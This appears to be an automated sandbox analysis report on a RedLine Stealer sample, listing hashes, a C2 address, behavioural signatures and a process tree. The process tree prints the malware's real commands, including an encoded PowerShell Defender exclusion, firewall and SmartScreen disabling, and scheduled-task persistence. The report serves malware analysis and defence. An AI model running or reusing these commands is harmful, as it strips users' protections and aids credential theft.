Analysis
-
max time kernel
83s -
max time network
143s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
07-07-2022 14:33
Static task
static1
Behavioral task
behavioral1
Sample
47645.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
47645.exe
Resource
win10v2004-20220414-en
General
-
Target
47645.exe
-
Size
1.8MB
-
MD5
30b6d624d18490acfe42a1944c6d3172
-
SHA1
35402770ba44139f50b5613c274a6b4607be3b16
-
SHA256
d3d816173bc3f78e89278f938bef7408a249453c31e65018386aa241ee6cbf92
-
SHA512
42f7b92a99a52c9a229cf09d945d5fcad38a4eecedfe609af6e77d9f5e966b37835a094c5b2121d20e6339fa450c0488af44046f5057e42021a61aae98cf6f4c
Malware Config
Extracted
redline
1327052997
37.235.54.26:8362
Signatures
-
Modifies security service 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Start = "4" powershell.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/215452-143-0x0000000000400000-0x000000000041E000-memory.dmp family_redline -
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Downloads MZ/PE file
-
Executes dropped EXE 3 IoCs
Processes:
doc.exeDllHost.exeGameInject.exepid process 1084 doc.exe 3372 DllHost.exe 215712 GameInject.exe -
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
DllHost.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation DllHost.exe -
Drops startup file 1 IoCs
Processes:
DllHost.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exe.lnk DllHost.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
GameInject.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "C:\\ProgramData\\Dllhost\\dllhost.exe" GameInject.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 21 api.ipify.org 22 api.ipify.org -
Suspicious use of SetThreadContext 1 IoCs
Processes:
doc.exedescription pid process target process PID 1084 set thread context of 215452 1084 doc.exe AppLaunch.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 20784 3372 WerFault.exe DllHost.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 13 IoCs
Processes:
DllHost.exepowershell.exeAppLaunch.exeGameInject.exepowershell.exepid process 3372 DllHost.exe 3372 DllHost.exe 3372 DllHost.exe 3372 DllHost.exe 18436 powershell.exe 18436 powershell.exe 215452 AppLaunch.exe 215452 AppLaunch.exe 215712 GameInject.exe 215852 powershell.exe 215852 powershell.exe 215712 GameInject.exe 215712 GameInject.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
Processes:
powershell.exeAppLaunch.exeGameInject.exepowershell.exedescription pid process Token: SeDebugPrivilege 18436 powershell.exe Token: SeBackupPrivilege 18436 powershell.exe Token: SeBackupPrivilege 18436 powershell.exe Token: SeRestorePrivilege 18436 powershell.exe Token: SeSecurityPrivilege 18436 powershell.exe Token: SeDebugPrivilege 215452 AppLaunch.exe Token: SeDebugPrivilege 215712 GameInject.exe Token: SeDebugPrivilege 215852 powershell.exe -
Suspicious use of WriteProcessMemory 32 IoCs
Processes:
47645.exeDllHost.exepowershell.exedoc.exeAppLaunch.exeGameInject.execmd.execmd.exedescription pid process target process PID 4196 wrote to memory of 1084 4196 47645.exe doc.exe PID 4196 wrote to memory of 1084 4196 47645.exe doc.exe PID 4196 wrote to memory of 1084 4196 47645.exe doc.exe PID 4196 wrote to memory of 3372 4196 47645.exe DllHost.exe PID 4196 wrote to memory of 3372 4196 47645.exe DllHost.exe PID 3372 wrote to memory of 18436 3372 DllHost.exe powershell.exe PID 3372 wrote to memory of 18436 3372 DllHost.exe powershell.exe PID 18436 wrote to memory of 27488 18436 powershell.exe netsh.exe PID 18436 wrote to memory of 27488 18436 powershell.exe netsh.exe PID 1084 wrote to memory of 215452 1084 doc.exe AppLaunch.exe PID 1084 wrote to memory of 215452 1084 doc.exe AppLaunch.exe PID 1084 wrote to memory of 215452 1084 doc.exe AppLaunch.exe PID 1084 wrote to memory of 215452 1084 doc.exe AppLaunch.exe PID 1084 wrote to memory of 215452 1084 doc.exe AppLaunch.exe PID 215452 wrote to memory of 215712 215452 AppLaunch.exe GameInject.exe PID 215452 wrote to memory of 215712 215452 AppLaunch.exe GameInject.exe PID 215452 wrote to memory of 215712 215452 AppLaunch.exe GameInject.exe PID 215712 wrote to memory of 215800 215712 GameInject.exe cmd.exe PID 215712 wrote to memory of 215800 215712 GameInject.exe cmd.exe PID 215712 wrote to memory of 215800 215712 GameInject.exe cmd.exe PID 215800 wrote to memory of 215852 215800 cmd.exe powershell.exe PID 215800 wrote to memory of 215852 215800 cmd.exe powershell.exe PID 215800 wrote to memory of 215852 215800 cmd.exe powershell.exe PID 215712 wrote to memory of 216008 215712 GameInject.exe cmd.exe PID 215712 wrote to memory of 216008 215712 GameInject.exe cmd.exe PID 215712 wrote to memory of 216008 215712 GameInject.exe cmd.exe PID 215712 wrote to memory of 216020 215712 GameInject.exe cmd.exe PID 215712 wrote to memory of 216020 215712 GameInject.exe cmd.exe PID 215712 wrote to memory of 216020 215712 GameInject.exe cmd.exe PID 216020 wrote to memory of 4600 216020 cmd.exe schtasks.exe PID 216020 wrote to memory of 4600 216020 cmd.exe schtasks.exe PID 216020 wrote to memory of 4600 216020 cmd.exe schtasks.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\47645.exe"C:\Users\Admin\AppData\Local\Temp\47645.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4196 -
C:\Users\Admin\AppData\Local\Temp\doc.exe"C:\Users\Admin\AppData\Local\Temp\doc.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1084 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:215452 -
C:\Users\Admin\AppData\Local\Temp\GameInject.exe"C:\Users\Admin\AppData\Local\Temp\GameInject.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:215712 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C powershell -EncodedCommand "PAAjAGYAaQB3AEcAOQBOADcAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwA1ADIAQgBxAEIATwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBsAFUANgBxAG8AWQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwAzAEgAUgBLACMAPgA=" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off5⤵
- Suspicious use of WriteProcessMemory
PID:215800 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAGYAaQB3AEcAOQBOADcAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwA1ADIAQgBxAEIATwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBsAFUANgBxAG8AWQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwAzAEgAUgBLACMAPgA="6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:215852
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"5⤵PID:216008
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk8743" /TR "C:\ProgramData\Dllhost\dllhost.exe"5⤵
- Suspicious use of WriteProcessMemory
PID:216020 -
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk8743" /TR "C:\ProgramData\Dllhost\dllhost.exe"6⤵
- Creates scheduled task(s)
PID:4600
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\DllHost.exe"C:\Users\Admin\AppData\Local\Temp\DllHost.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3372 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty –Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System –Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty –Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run –Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)3⤵
- Modifies security service
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:18436 -
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off4⤵
- Modifies Windows Firewall
PID:27488
-
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3372 -s 20643⤵
- Program crash
PID:20784
-
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 444 -p 3372 -ip 33721⤵PID:20608
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
440KB
MD56368031626da1f0d51bcac43104b123f
SHA15a340a1a3edc0bf03526e677a0415ffd156c139c
SHA25611004aff3ee4083623a7e01cb06438e1b8879e2d00cf2350c26fb1003125577d
SHA512442b04dc415858e61555b0f026c6ebb76fcad22f9317736766bb793dbcc22fc014ddb1973feaff05298905bf2e97036aa64ae96fa9cc9884d50015d17fbac465
-
Filesize
1KB
MD5ddab5e26e538fa9c9f65b6ba13523eb8
SHA1003942014894706e2498020df601e97b2cd27a56
SHA25629892a9f94bf3e6e8a675fbdb4faf6e31af24547820d031c23fe78adcf750a31
SHA512f836fc230e0447b28319390eeaec09ed6e750178f9c0c9e9e43e50c6892c1b2c6138ab96c39c56c7bf9963e9cf06d8cb93801e99ad3465f5ff95d3ce2708b5ab
-
Filesize
440KB
MD56368031626da1f0d51bcac43104b123f
SHA15a340a1a3edc0bf03526e677a0415ffd156c139c
SHA25611004aff3ee4083623a7e01cb06438e1b8879e2d00cf2350c26fb1003125577d
SHA512442b04dc415858e61555b0f026c6ebb76fcad22f9317736766bb793dbcc22fc014ddb1973feaff05298905bf2e97036aa64ae96fa9cc9884d50015d17fbac465
-
Filesize
440KB
MD56368031626da1f0d51bcac43104b123f
SHA15a340a1a3edc0bf03526e677a0415ffd156c139c
SHA25611004aff3ee4083623a7e01cb06438e1b8879e2d00cf2350c26fb1003125577d
SHA512442b04dc415858e61555b0f026c6ebb76fcad22f9317736766bb793dbcc22fc014ddb1973feaff05298905bf2e97036aa64ae96fa9cc9884d50015d17fbac465
-
Filesize
82KB
MD50720a011066bb50774deffd33c5903c8
SHA154c4393d7f15192717339ab39be1978127443c79
SHA2560db9920b4a051c6ee31c6be0ae5d06ff493d85872fead3a906c56e8513fe7da6
SHA512410e96a4a240245780b9e1939cef06c35ea2192761ca2cfba28add5d7707e9e9ff37d63364389dc729ce42656b60b64e659c460125eb6346d57a2fd1452aa248
-
Filesize
82KB
MD50720a011066bb50774deffd33c5903c8
SHA154c4393d7f15192717339ab39be1978127443c79
SHA2560db9920b4a051c6ee31c6be0ae5d06ff493d85872fead3a906c56e8513fe7da6
SHA512410e96a4a240245780b9e1939cef06c35ea2192761ca2cfba28add5d7707e9e9ff37d63364389dc729ce42656b60b64e659c460125eb6346d57a2fd1452aa248
-
Filesize
2.4MB
MD5401cdd939e412e97c9eab5766be869d9
SHA1e20e78080715f336dd0fc8bb7476d1a4fbc2f7b0
SHA2567b7964fd2f700fa35f362c4c112d8583feb112310ed9a2ac1fc017efb67ee573
SHA512266070eb135694cf6bfbfd30868c20381fb7fe16a8c53f41c05a88e8b68baa6fc83823f6806fbd30d56cbf46a7fcada5da0364aebf3a8bbb32fed6abc697167b
-
Filesize
2.4MB
MD5401cdd939e412e97c9eab5766be869d9
SHA1e20e78080715f336dd0fc8bb7476d1a4fbc2f7b0
SHA2567b7964fd2f700fa35f362c4c112d8583feb112310ed9a2ac1fc017efb67ee573
SHA512266070eb135694cf6bfbfd30868c20381fb7fe16a8c53f41c05a88e8b68baa6fc83823f6806fbd30d56cbf46a7fcada5da0364aebf3a8bbb32fed6abc697167b